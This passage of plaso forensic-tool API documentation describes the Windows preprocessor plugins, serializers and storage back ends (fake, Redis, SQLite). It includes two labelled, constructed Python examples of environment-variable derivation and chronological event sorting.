            • mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base.

plaso.preprocessors.mediator module

The preprocess mediator.

class plaso.preprocessors.mediator.PreprocessMediator(session, storage_writer, knowledge_base)
    Bases: object

    Preprocess mediator.

    AddTimeZoneInformation(time_zone_artifact)
        Adds a time zone defined by the operating system.
        Parameters: time_zone_artifact (TimeZoneArtifact) – time zone artifact.
        Raises: KeyError – if the time zone already exists.


    AddUserAccount(user_account)
        Adds a user account.
        Parameters: user_account (UserAccountArtifact) – user account artifact.
        Raises: KeyError – if the user account already exists.

    AddWindowsEventLogProvider(windows_eventlog_provider)
        Adds a Windows Event Log provider.
        Parameters: windows_eventlog_provider (WindowsEventLogProviderArtifact) – Windows Event Log provider.
        Raises: KeyError – if the Windows Event Log provider already exists.

    ProducePreprocessingWarning(plugin_name, message)
        Produces a preprocessing warning.
        Parameters:
            • plugin_name (str) – name of the preprocess plugin.
            • message (str) – message of the warning.

    SetFileEntry(file_entry)
        Sets the active file entry.
        Parameters: file_entry (dfvfs.FileEntry) – file entry.

    property knowledge_base
        knowledge base. Type: KnowledgeBase

plaso.preprocessors.windows module

This file contains preprocessors for Windows.

class plaso.preprocessors.windows.WindowsAllUsersAppDataKnowledgeBasePlugin
    Bases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin

    The allusersdata knowledge base value plugin. The allusersdata value is needed for the expansion of %%environ_allusersappdata%% in artifact definitions.

    Collect(mediator)
        Collects values from the knowledge base.
        Parameters: mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base.
        Raises: PreProcessFail – if the preprocessing fails.

class plaso.preprocessors.windows.WindowsAllUsersAppProfileKnowledgeBasePlugin
    Bases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin

    The allusersprofile knowledge base value plugin. The allusersprofile value is needed for the expansion of %%environ_allusersappprofile%% in artifact definitions. It is derived from %ProgramData% on versions of Windows (Vista and later) that do not define %AllUsersProfile%.

    Collect(mediator)
        Collects values from the knowledge base.


        Parameters: mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base.
        Raises: PreProcessFail – if the preprocessing fails.

class plaso.preprocessors.windows.WindowsAllUsersProfileEnvironmentVariablePlugin
    Bases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin
    The Windows %AllUsersProfile% environment variable plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableAllUsersProfile'

class plaso.preprocessors.windows.WindowsAvailableTimeZonesPlugin
    Bases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin, plaso.lib.dtfabric_helper.DtFabricHelper
    The Windows available time zones plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsAvailableTimeZones'

class plaso.preprocessors.windows.WindowsCodepagePlugin
    Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
    The Windows codepage plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsCodePage'

class plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin
    Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
    Windows environment variable artifact preprocessor plugin interface.

class plaso.preprocessors.windows.WindowsEventLogProvidersPlugin
    Bases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin
    The Windows Event Log providers plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsEventLogProviders'

class plaso.preprocessors.windows.WindowsHostnamePlugin
    Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
    The Windows hostname plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsComputerName'

class plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPlugin
    Bases: plaso.preprocessors.interface.FileSystemArtifactPreprocessorPlugin
    Windows path environment variable plugin interface.

class plaso.preprocessors.windows.WindowsProgramDataEnvironmentVariablePlugin
    Bases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin
    The Windows %ProgramData% environment variable plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramData'

class plaso.preprocessors.windows.WindowsProgramDataKnowledgeBasePlugin
    Bases: plaso.preprocessors.interface.KnowledgeBasePreprocessorPlugin

    The programdata knowledge base value plugin. The programdata value is needed for the expansion of %%environ_programdata%% in artifact definitions.


    It is derived from %AllUsersProfile% on versions of Windows prior to Vista that do not define %ProgramData%.

    Collect(mediator)
        Collects values from the knowledge base.
        Parameters: mediator (PreprocessMediator) – mediates interactions between preprocess plugins and other components, such as storage and knowledge base.
        Raises: PreProcessFail – if the preprocessing fails.

class plaso.preprocessors.windows.WindowsProgramFilesEnvironmentVariablePlugin
    Bases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin
    The Windows %ProgramFiles% environment variable plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramFiles'

class plaso.preprocessors.windows.WindowsProgramFilesX86EnvironmentVariablePlugin
    Bases: plaso.preprocessors.windows.WindowsEnvironmentVariableArtifactPreprocessorPlugin
    The Windows %ProgramFilesX86% environment variable plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableProgramFilesX86'

class plaso.preprocessors.windows.WindowsSystemProductPlugin
    Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
    The Windows system product information plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsProductName'

class plaso.preprocessors.windows.WindowsSystemRootEnvironmentVariablePlugin
    Bases: plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPlugin
    The Windows %SystemRoot% environment variable plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableSystemRoot'

class plaso.preprocessors.windows.WindowsSystemVersionPlugin
    Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
    The Windows system version information plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsCurrentVersion'

class plaso.preprocessors.windows.WindowsTimeZonePlugin
    Bases: plaso.preprocessors.interface.WindowsRegistryValueArtifactPreprocessorPlugin
    The Windows time zone plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsTimezone'

class plaso.preprocessors.windows.WindowsUserAccountsPlugin
    Bases: plaso.preprocessors.interface.WindowsRegistryKeyArtifactPreprocessorPlugin
    The Windows user account plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsRegistryProfiles'

class plaso.preprocessors.windows.WindowsWinDirEnvironmentVariablePlugin
    Bases: plaso.preprocessors.windows.WindowsPathEnvironmentVariableArtifactPreprocessorPlugin
    The Windows %WinDir% environment variable plugin.
    ARTIFACT_DEFINITION_NAME = 'WindowsEnvironmentVariableWinDir'
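An added example, not plaso's own preprocessors or knowledge base, of the two knowledge base derivations described above: %ProgramData% is filled in from %AllUsersProfile% on a pre-Vista system that lacks it, %AllUsersProfile% is filled in from %ProgramData% on Vista and later, and neither overwrites a value that was actually collected. The expansion of %%environ_<name>%% placeholders in an artifact path is included because it is the stated reason the values are needed. The KnowledgeBase class, the plugin base class, the method names and the Vendor\service.log path are all hypothetical and constructed for this example.

```python
import re


class KnowledgeBase:
    """Hypothetical stand-in for plaso's knowledge base: environment variables by name."""

    def __init__(self, environment_variables=None):
        self._values = {name.lower(): value
                        for name, value in (environment_variables or {}).items()}

    def GetEnvironmentVariable(self, name):
        return self._values.get(name.lower())

    def SetEnvironmentVariable(self, name, value):
        self._values[name.lower()] = value


class DerivedEnvironmentVariablePlugin:
    """Fills TARGET from SOURCE when TARGET was not collected from the system."""
    SOURCE = None
    TARGET = None

    def Collect(self, knowledge_base):
        if knowledge_base.GetEnvironmentVariable(self.TARGET) is not None:
            return  # the system defines it; never overwrite a collected value
        value = knowledge_base.GetEnvironmentVariable(self.SOURCE)
        if value is not None:
            knowledge_base.SetEnvironmentVariable(self.TARGET, value)


class ProgramDataPlugin(DerivedEnvironmentVariablePlugin):
    """Windows prior to Vista defines %AllUsersProfile% but not %ProgramData%."""
    SOURCE, TARGET = 'AllUsersProfile', 'ProgramData'


class AllUsersProfilePlugin(DerivedEnvironmentVariablePlugin):
    """Vista and later define %ProgramData% but may not define %AllUsersProfile%."""
    SOURCE, TARGET = 'ProgramData', 'AllUsersProfile'


def run_knowledge_base_plugins(knowledge_base):
    """Runs the derivations after the registry-based values have been collected."""
    for plugin in (ProgramDataPlugin(), AllUsersProfilePlugin()):
        plugin.Collect(knowledge_base)
    return knowledge_base


_PLACEHOLDER = re.compile(r'%%environ_([a-z0-9]+)%%', re.IGNORECASE)


def expand_artifact_path(path, knowledge_base):
    """Expands %%environ_<name>%% placeholders; None if any value is unknown."""
    missing = []

    def replace(match):
        value = knowledge_base.GetEnvironmentVariable(match.group(1))
        if value is None:
            missing.append(match.group(1))
            return match.group(0)
        return value

    expanded = _PLACEHOLDER.sub(replace, path)
    return None if missing else expanded


# Constructed artifact-style path; the Vendor directory is made up for the example.
SERVICE_LOG = '%%environ_programdata%%\\Vendor\\service.log'


def expand_on_both_generations():
    """The same artifact path resolved on an XP-style and a Windows 10-style system."""
    xp = run_knowledge_base_plugins(
        KnowledgeBase({'AllUsersProfile': 'C:\\Documents and Settings\\All Users'}))
    win10 = run_knowledge_base_plugins(KnowledgeBase({'ProgramData': 'C:\\ProgramData'}))
    return (expand_artifact_path(SERVICE_LOG, xp),
            expand_artifact_path(SERVICE_LOG, win10))
```

Returning None for an unresolved placeholder, rather than a path with a literal %%environ_...%% left in it, keeps a missing preprocessing value from silently turning into a file system search for a name that cannot exist.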


Module contents

Preprocessor.

5.1.13 plaso.serializer package

Submodules

plaso.serializer.interface module

The serializer object interfaces.

class plaso.serializer.interface.AttributeContainerSerializer
    Bases: object

    Class that implements the attribute container serializer interface.

    abstract ReadSerialized(serialized)
        Reads an attribute container from serialized form.
        Parameters: serialized (object) – serialized form.
        Returns: attribute container.
        Return type: AttributeContainer

    abstract WriteSerialized(attribute_container)
        Writes an attribute container to serialized form.
        Parameters: attribute_container (AttributeContainer) – attribute container.
        Returns: serialized form.
        Return type: object

plaso.serializer.json_serializer module

The JSON serializer object implementation.

class plaso.serializer.json_serializer.JSONAttributeContainerSerializer
    Bases: plaso.serializer.interface.AttributeContainerSerializer

    JSON attribute container serializer.

    classmethod ReadSerialized(json_string)
        Reads an attribute container from serialized form.
        Parameters: json_string (str) – JSON serialized attribute container.
        Returns: attribute container or None.
        Return type: AttributeContainer

    classmethod ReadSerializedDict(json_dict)
        Reads an attribute container from serialized dictionary form.
        Parameters: json_dict (dict[str, object]) – JSON serialized objects.
        Returns: attribute container or None.
        Return type: AttributeContainer
        Raises: TypeError – if the serialized dictionary does not contain an AttributeContainer.


    classmethod WriteSerialized(attribute_container)
        Writes an attribute container to serialized form.
        Parameters: attribute_container (AttributeContainer) – attribute container.
        Returns: A JSON string containing the serialized form.
        Return type: str

    classmethod WriteSerializedDict(attribute_container)
        Writes an attribute container to serialized form.
        Parameters: attribute_container (AttributeContainer) – attribute container.
        Returns: JSON serialized objects.
        Return type: dict[str, object]

plaso.serializer.logger module

The serializer sub module logger.

Module contents

5.1.14 plaso.single_process package

Submodules

plaso.single_process.extraction_engine module

The single process processing engine.

class plaso.single_process.extraction_engine.SingleProcessEngine
    Bases: plaso.engine.engine.BaseEngine
    Class that defines the single process engine.

    ProcessSources(session, source_path_specs, storage_writer, resolver_context, processing_configuration, force_parser=False, status_update_callback=None)
        Processes the sources.
        Parameters:
            • session (Session) – session in which the sources are processed.
            • source_path_specs (list[dfvfs.PathSpec]) – path specifications of the sources to process.
            • storage_writer (StorageWriter) – storage writer for a session storage.
            • resolver_context (dfvfs.Context) – resolver context.
            • processing_configuration (ProcessingConfiguration) – processing configuration.
            • force_parser (Optional[bool]) – True if a specified parser should be forced to be used to extract events.
            • status_update_callback (Optional[function]) – callback function for status updates.
        Returns: processing status.
        Return type: ProcessingStatus

Module contents

5.1.15 plaso.storage package

Subpackages

plaso.storage.fake package

Submodules

plaso.storage.fake.event_heap module

Heap to sort events in chronological order.

class plaso.storage.fake.event_heap.EventHeap
    Bases: object
    Event heap.

    PopEvent()
        Pops an event from the heap.
        Returns: event.
        Return type: EventObject

    PopEvents()
        Pops events from the heap.
        Yields: EventObject – event.

    PushEvent(event, event_index)
        Pushes an event onto the heap.
        Parameters:
            • event (EventObject) – event.
            • event_index (int) – index of the event in the storage.

    property number_of_events
        number of serialized events on the heap.
        Type: int

plaso.storage.fake.fake_store module

Fake (in-memory only) store for testing.

class plaso.storage.fake.fake_store.FakeStore(storage_type='session')
    Bases: plaso.storage.interface.BaseStore
    Fake (in-memory only) store for testing.

    Close()
        Closes the store.
        Raises:
            • IOError – if the store is already closed.
            • OSError – if the store is already closed.

    GetAttributeContainerByIdentifier(container_type, identifier)
        Retrieves a specific type of container with a specific identifier.
        Parameters:
            • container_type (str) – container type.
            • identifier (AttributeContainerIdentifier) – attribute container identifier.
        Returns: attribute container or None if not available.
        Return type: AttributeContainer

    GetAttributeContainerByIndex(container_type, index)
        Retrieves a specific attribute container.
        Parameters:
            • container_type (str) – attribute container type.
            • index (int) – attribute container index.
        Returns: attribute container or None if not available.
        Return type: AttributeContainer
        Raises:
            • IOError – if the attribute container type is not supported.
            • OSError – if the attribute container type is not supported.

    GetAttributeContainers(container_type)
        Retrieves a specific type of attribute containers.
        Parameters: container_type (str) – attribute container type.
        Returns: attribute container generator.
        Return type: generator(AttributeContainers)

    GetEventTagByEventIdentifier(event_identifier)
        Retrieves the event tag related to a specific event identifier.
        Parameters: event_identifier (AttributeContainerIdentifier) – event.
        Returns: event tag or None if not available.
        Return type: EventTag
        Raises:
            • IOError – if an unsupported event identifier is provided or if the event tag does not exist.
            • OSError – if an unsupported event identifier is provided or if the event tag does not exist.

    GetNumberOfAttributeContainers(container_type)
        Retrieves the number of a specific type of attribute containers.
        Parameters: container_type (str) – attribute container type.
        Returns: the number of containers of a specified type.
        Return type: int


    GetSortedEvents(time_range=None)
        Retrieves the events in increasing chronological order.
        Parameters: time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
        Returns: event generator.
        Return type: generator(EventObject)
        Raises:
            • IOError – when the storage writer is closed.
            • OSError – when the storage writer is closed.

    HasAttributeContainers(container_type)
        Determines if a store contains a specific type of attribute container.
        Parameters: container_type (str) – attribute container type.
        Returns: True if the store contains the specified type of attribute containers.
        Return type: bool

    Open(**kwargs)
        Opens the store.
        Raises:
            • IOError – if the store is already opened.
            • OSError – if the store is already opened.

plaso.storage.fake.writer module

Fake (in-memory only) storage writer for testing.

class plaso.storage.fake.writer.FakeStorageWriter(storage_type='session')
    Bases: plaso.storage.writer.StorageWriter
    Fake (in-memory only) storage writer object.

    task_completion
        task completion attribute container.
        Type: TaskCompletion

    task_start
        task start attribute container.
        Type: TaskStart

    GetFirstWrittenEventSource()
        Retrieves the first event source that was written after open.
        Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition.
        Returns: event source or None if there are no newly written ones.
        Return type: EventSource
        Raises:
            • IOError – when the storage writer is closed.
            • OSError – when the storage writer is closed.

    GetNextWrittenEventSource()
        Retrieves the next event source that was written after open.
        Returns: event source or None if there are no newly written ones.
        Return type: EventSource
        Raises:
            • IOError – when the storage writer is closed.
            • OSError – when the storage writer is closed.

    Open(**unused_kwargs)
        Opens the storage writer.
        Raises:
            • IOError – if the storage writer is already opened.
            • OSError – if the storage writer is already opened.

    WriteTaskCompletion(task)
        Writes task completion information.
        Parameters: task (Task) – task.
        Raises:
            • IOError – if the storage type does not support writing a task completion or when the storage writer is closed.
            • OSError – if the storage type does not support writing a task completion or when the storage writer is closed.

    WriteTaskStart(task)
        Writes task start information.
        Parameters: task (Task) – task.
        Raises:
            • IOError – if the storage type does not support writing a task start or when the storage writer is closed.
            • OSError – if the storage type does not support writing a task start or when the storage writer is closed.
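The fake package above describes an EventHeap keyed on (timestamp, storage index) and a FakeStore.GetSortedEvents that yields events in chronological order, optionally limited to a TimeRange. The following stand-alone illustration of that design is an added example, not plaso's own code: Event is a minimal stand-in for EventObject, and the time range is assumed to be an inclusive (start, end) pair of microsecond timestamps.

```python
import heapq
from typing import Iterator, List, Optional, Tuple


class Event:
    """Minimal stand-in for plaso's EventObject (constructed for this example)."""

    def __init__(self, timestamp: int, description: str):
        self.timestamp = timestamp  # microseconds since epoch, as plaso uses
        self.description = description


class EventHeap:
    """In-memory heap that yields events in increasing chronological order.

    Mirrors the PushEvent/PopEvent/PopEvents interface described above. The
    storage index is used as a tiebreaker so that events with identical
    timestamps come out in a deterministic order and the heap never has to
    compare two Event objects directly (which would raise TypeError).
    """

    def __init__(self) -> None:
        self._heap: List[Tuple[int, int, Event]] = []

    @property
    def number_of_events(self) -> int:
        return len(self._heap)

    def PushEvent(self, event: Event, event_index: int) -> None:
        heapq.heappush(self._heap, (event.timestamp, event_index, event))

    def PopEvent(self) -> Optional[Event]:
        if not self._heap:
            return None
        _, _, event = heapq.heappop(self._heap)
        return event

    def PopEvents(self) -> Iterator[Event]:
        while self._heap:
            yield self.PopEvent()


def GetSortedEvents(events: List[Event],
                    time_range: Optional[Tuple[int, int]] = None) -> List[Event]:
    """Returns events in chronological order, like FakeStore.GetSortedEvents.

    time_range is an assumed inclusive (start_timestamp, end_timestamp) pair;
    events outside it are not pushed onto the heap at all, so the filter costs
    nothing on the sort side.
    """
    heap = EventHeap()
    for index, event in enumerate(events):  # index plays the storage index role
        if time_range is not None:
            start, end = time_range
            if event.timestamp < start or event.timestamp > end:
                continue
        heap.PushEvent(event, index)
    return list(heap.PopEvents())


if __name__ == '__main__':
    # Constructed sample: two events share timestamp 10 to show the tiebreak.
    sample = [Event(30, 'c'), Event(10, 'a'), Event(20, 'b'), Event(10, 'a2')]
    for event in GetSortedEvents(sample, time_range=(10, 20)):
        print(event.timestamp, event.description)
```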

Module contents

plaso.storage.redis package

Submodules

plaso.storage.redis.reader module

Redis storage reader.

class plaso.storage.redis.reader.RedisStorageReader(session_identifier, task_identifier, redis_client=None)
    Bases: plaso.storage.reader.StorageReader
    Redis storage file reader.

plaso.storage.redis.redis_store module

Redis store. Only supports task storage at the moment.

class plaso.storage.redis.redis_store.RedisStore(storage_type='session')
    Bases: plaso.storage.interface.BaseStore
    Redis store.
    Attribute containers are stored as Redis Hashes. All keys are prefixed with the session identifier to avoid collisions. Event identifiers are also stored in an index to enable sorting.

    DEFAULT_REDIS_URL = 'redis://127.0.0.1/0'

    Close()
        Closes the store.
        Raises:
            • IOError – if the store is already closed.
            • OSError – if the store is already closed.

    GetAttributeContainerByIdentifier(container_type, identifier)
        Retrieves a specific type of container with a specific identifier.
        Parameters:
            • container_type (str) – container type.
            • identifier (RedisKeyIdentifier) – attribute container identifier.
        Returns: attribute container or None if not available.
        Return type: AttributeContainer
        Raises:
            • IOError – when the store is closed or if an unsupported identifier is provided.
            • OSError – when the store is closed or if an unsupported identifier is provided.

    GetAttributeContainerByIndex(container_type, index)
        Retrieves a specific attribute container.
        Parameters:
            • container_type (str) – attribute container type.
            • index (int) – attribute container index.
        Returns: attribute container or None if not available.
        Return type: AttributeContainer
        Raises:
            • IOError – if the attribute container type is not supported.
            • OSError – if the attribute container type is not supported.

    GetAttributeContainers(container_type)
        Retrieves attribute containers.
        Parameters: container_type (str) – container type attribute of the container being added.
        Yields: AttributeContainer – attribute container.

    GetEventTagByEventIdentifier(event_identifier)
        Retrieves the event tag related to a specific event identifier.
        Parameters: event_identifier (AttributeContainerIdentifier) – event.
        Returns: event tag or None if not available.
        Return type: EventTag

    GetNumberOfAttributeContainers(container_type)
        Retrieves the number of a specific type of attribute containers.
        Parameters: container_type (str) – attribute container type.
        Returns: the number of containers of a specified type.
        Return type: int

    GetSerializedAttributeContainers(container_type, cursor, maximum_number_of_items)
        Fetches serialized attribute containers.
        Parameters:
            • container_type (str) – attribute container type.
            • cursor (int) – Redis cursor.
            • maximum_number_of_items (int) – maximum number of containers to retrieve, where 0 represents no limit.
        Returns: tuple containing: int: Redis cursor. list[bytes]: serialized attribute containers.
        Return type: tuple

    GetSortedEvents(time_range=None)
        Retrieves the events in increasing chronological order.
        Parameters: time_range (Optional[TimeRange]) – This argument is not supported by the Redis store.
        Yields: EventObject – event.
        Raises: RuntimeError – if a time_range argument is specified.

    HasAttributeContainers(container_type)
        Determines if the store contains a specific type of attribute container.
        Parameters: container_type (str) – attribute container type.
        Returns: True if the store contains the specified type of attribute containers.
        Return type: bool

    classmethod MarkTaskAsMerging(task_identifier, session_identifier, redis_client=None, url=None)
        Marks a finalized task as pending merge.


        Parameters:
            • task_identifier (str) – identifier of the task.
            • session_identifier (str) – session identifier, formatted as a UUID.
            • redis_client (Optional[Redis]) – Redis client to query. If specified, no new client will be created.
            • url (Optional[str]) – URL for a Redis database. If not specified, REDIS_DEFAULT_URL will be used.
        Raises:
            • IOError – if the task being updated is not finalized.
            • OSError – if the task being updated is not finalized.

    Open(redis_client=None, session_identifier=None, task_identifier=None, url=None, **unused_kwargs)
        Opens the store.
        Parameters:
            • redis_client (Optional[Redis]) – Redis client to query. If specified, no new client will be created. If no client is specified a new client will be opened connected to the Redis instance specified by ‘url’.
            • session_identifier (Optional[str]) – session identifier, formatted as a UUID.
            • task_identifier (Optional[str]) – unique identifier of the task the store will store containers for. If not specified, an identifier will be generated.
            • url (Optional[str]) – URL for a Redis database. If not specified, the DEFAULT_REDIS_URL will be used.
        Raises:
            • IOError – if the store is already connected to a Redis instance.
            • OSError – if the store is already connected to a Redis instance.

    Remove()
        Removes the contents of the store from Redis.

    RemoveAttributeContainer(container_type, identifier)
        Removes an attribute container from the store.
        Parameters:
            • container_type (str) – container type attribute of the container being removed.
            • identifier (AttributeContainerIdentifier) – event data identifier.

    RemoveAttributeContainers(container_type, container_identifiers)
        Removes multiple attribute containers from the store.
        Parameters:
            • container_type (str) – container type attribute of the container being removed.
            • container_identifiers (list[AttributeContainerIdentifier]) – event data identifiers.

    classmethod ScanForProcessedTasks(session_identifier, redis_client=None, url=None)
        Scans a Redis database for processed tasks.
        Parameters:
            • session_identifier (str) – session identifier, formatted as a UUID.
            • redis_client (Optional[Redis]) – Redis client to query. If specified, no new client will be created.
            • url (Optional[str]) – URL for a Redis database. If not specified, REDIS_DEFAULT_URL will be used.
        Returns: tuple containing: list[str]: identifiers of processed tasks, which may be empty if the connection to Redis times out. Redis: Redis client used for the query.
        Return type: tuple

plaso.storage.redis.writer module

Storage writer for Redis.

class plaso.storage.redis.writer.RedisStorageWriter(storage_type='session')
    Bases: plaso.storage.writer.StorageWriter
    Redis-based storage writer.

    GetFirstWrittenEventSource()
        Retrieves the first event source that was written after open.
        Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition.
        Returns: None as there are no newly written event sources.
        Return type: EventSource
        Raises:
            • IOError – if the storage writer is closed.
            • OSError – if the storage writer is closed.

    GetNextWrittenEventSource()
        Retrieves the next event source that was written after open.
        Returns: None as there are no newly written event sources.
        Return type: EventSource
        Raises:
            • IOError – if the storage writer is closed.
            • OSError – if the storage writer is closed.

    Open(redis_client=None, session_identifier=None, task_identifier=None, **unused_kwargs)
        Opens the storage writer.
        Parameters:
            • redis_client (Optional[Redis]) – Redis client to query. If specified, no new client will be created. If no client is specified a new client will be opened connected to the Redis instance specified by ‘url’.
            • session_identifier (Optional[str]) – session identifier.
            • task_identifier (Optional[str]) – task identifier.
        Raises:
            • IOError – if the storage writer is already opened.
            • OSError – if the storage writer is already opened.

    WritePreprocessingInformation(knowledge_base)
        Writes preprocessing information.
        Parameters: knowledge_base (KnowledgeBase) – contains the preprocessing information.
        Raises:
            • IOError – always as the Redis store does not support preprocessing information.
            • OSError – always as the Redis store does not support preprocessing information.

    WriteSessionCompletion(session)
        Writes session completion information.
        Parameters: session (Session) – session the storage changes are part of.
        Raises:
            • IOError – always, as the Redis store does not support writing a session completion.
            • OSError – always, as the Redis store does not support writing a session completion.

    WriteSessionConfiguration(session)
        Writes session configuration information.
        Parameters: session (Session) – session the storage changes are part of.
        Raises:
            • IOError – always, as the Redis store does not support writing a session configuration.
            • OSError – always, as the Redis store does not support writing a session configuration.

    WriteSessionStart(session)
        Writes session start information.
        Parameters: session (Session) – session the storage changes are part of.
        Raises:
            • IOError – always, as the Redis store does not support writing a session start.
            • OSError – always, as the Redis store does not support writing a session start.

Module contents

plaso.storage.sqlite package

Submodules

plaso.storage.sqlite.reader module

SQLite-based storage file reader.

class plaso.storage.sqlite.reader.SQLiteStorageFileReader(path)
    Bases: plaso.storage.reader.StorageReader
    SQLite-based storage file reader.

plaso.storage.sqlite.sqlite_file module

SQLite-based storage file.

class plaso.storage.sqlite.sqlite_file.SQLiteStorageFile(storage_type='session')
    Bases: plaso.storage.interface.BaseStore
    SQLite-based storage file.

    compression_format
        compression format.
        Type: str

    format_version
        storage format version.
        Type: int

    serialization_format
        serialization format.
        Type: str

    storage_type
        storage type.
        Type: str

    classmethod CheckSupportedFormat(path, check_readable_only=False)
        Checks if the storage file format is supported.
        Parameters:
            • path (str) – path to the storage file.
            • check_readable_only (Optional[bool]) – whether the store should only be checked to see if it can be read. If False, the store will be checked to see if it can be read and written to.
        Returns: True if the format is supported.
        Return type: bool

    Close()
        Closes the file.
        Raises:
            • IOError – if the storage file is already closed.
            • OSError – if the storage file is already closed.

    GetAttributeContainerByIdentifier(container_type, identifier)
        Retrieves a specific type of container with a specific identifier.
        Parameters:
            • container_type (str) – container type.
            • identifier (SQLTableIdentifier) – attribute container identifier.
        Returns: attribute container or None if not available.
        Return type: AttributeContainer
        Raises:
            • IOError – when the store is closed or if an unsupported identifier is provided.
            • OSError – when the store is closed or if an unsupported identifier is provided.

    GetAttributeContainerByIndex(container_type, index)
        Retrieves a specific attribute container.
        Parameters:
            • container_type (str) – attribute container type.
            • index (int) – attribute container index.
        Returns: attribute container or None if not available.
        Return type: AttributeContainer
        Raises:
            • IOError – when the store is closed or when there is an error querying the storage file.
            • OSError – when the store is closed or when there is an error querying the storage file.

    GetAttributeContainers(container_type)
        Retrieves a specific type of stored attribute containers.
        Parameters: container_type (str) – attribute container type.
        Returns: attribute container generator.
        Return type: generator(AttributeContainer)
        Raises:
            • IOError – when there is an error querying the storage file.
            • OSError – when there is an error querying the storage file.

    GetEventTagByEventIdentifier(event_identifier)
        Retrieves the event tag related to a specific event identifier.
        Parameters: event_identifier (SQLTableIdentifier) – event.
        Returns: event tag or None if not available.
        Return type: EventTag
        Raises:
            • IOError – when the store is closed or when there is an error querying the storage file.
            • OSError – when the store is closed or when there is an error querying the storage file.

    GetNumberOfAttributeContainers(container_type)
        Retrieves the number of a specific type of attribute containers.
        Parameters: container_type (str) – attribute container type.
        Returns: the number of containers of a specified type.
        Return type: int
        Raises:
            • IOError – when there is an error querying the storage file.
            • OSError – when there is an error querying the storage file.
            • ValueError – if an unsupported container type is provided.

    GetSortedEvents(time_range=None)
        Retrieves the events in increasing chronological order.
        Parameters: time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
        Returns: event generator.
        Return type: generator(EventObject)

    HasAttributeContainers(container_type)
        Determines if store contains a specific type of attribute containers.
        Parameters: container_type (str) – attribute container type.
        Returns: True if the store contains the specified type of attribute containers.
        Return type: bool

    Open(path=None, read_only=True, **unused_kwargs)
        Opens the store.
        Parameters:
            • path (Optional[str]) – path to the storage file.
            • read_only (Optional[bool]) – True if the file should be opened in read-only mode.
        Raises:
            • IOError – if the storage file is already opened or if the database cannot be connected.
            • OSError – if the storage file is already opened or if the database cannot be connected.
            • ValueError – if path is missing.

plaso.storage.sqlite.writer module

Storage writer for SQLite storage files.

class plaso.storage.sqlite.writer.SQLiteStorageFileWriter(storage_type='session')
    Bases: plaso.storage.writer.StorageWriter
    SQLite-based storage file writer.

    GetFirstWrittenEventSource()
        Retrieves the first event source that was written after open.
        Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition.
        Returns: event source or None if there are no newly written ones.
        Return type: EventSource
        Raises:
            • IOError – when the storage writer is closed.
            • OSError – when the storage writer is closed.

    GetNextWrittenEventSource()
        Retrieves the next event source that was written after open.
        Returns: event source or None if there are no newly written ones.
        Return type: EventSource
        Raises:
            • IOError – when the storage writer is closed.
            • OSError – when the storage writer is closed.

    Open(path=None, **unused_kwargs)
        Opens the storage writer.
        Parameters: path (Optional[str]) – path to the output file.
        Raises:
            • IOError – if the storage writer is already opened.
            • OSError – if the storage writer is already opened.

Module contents

Submodules

plaso.storage.event_tag_index module

The event tag index.

class plaso.storage.event_tag_index.EventTagIndex
    Bases: object
    Event tag index.
    The event tag index is used to map event tags to events. It is necessary for the ZIP storage files since previously stored event tags cannot be altered.

    GetEventTagByIdentifier(storage_reader, event_identifier)
        Retrieves the most recently updated event tag for an event.
        Parameters:
            • storage_reader (StorageReader) – storage reader.
            • event_identifier (AttributeContainerIdentifier) – event attribute container identifier.
        Returns: event tag or None if the event has no event tag.
        Return type: EventTag

    SetEventTag(event_tag)
        Sets an event tag in the index.
        Parameters: event_tag (EventTag) – event tag.

plaso.storage.factory module

This file contains the storage factory class.

class plaso.storage.factory.StorageFactory
    Bases: object
    Storage factory.

    classmethod CheckStorageFileHasSupportedFormat(path, check_readable_only=False)
        Checks if the storage file format is supported.
        Parameters:
            • path (str) – path to the storage file.
            • check_readable_only (Optional[bool]) – whether the store should only be checked to see if it can be read. If False, the store will be checked to see if it can be read and written to.
        Returns: True if the format is supported.
        Return type: bool

    classmethod CreateStorageFile(storage_format)
        Creates a storage file.
        Parameters: storage_format (str) – storage format.
        Returns: a storage file or None if the storage file cannot be opened or the storage format is not supported.
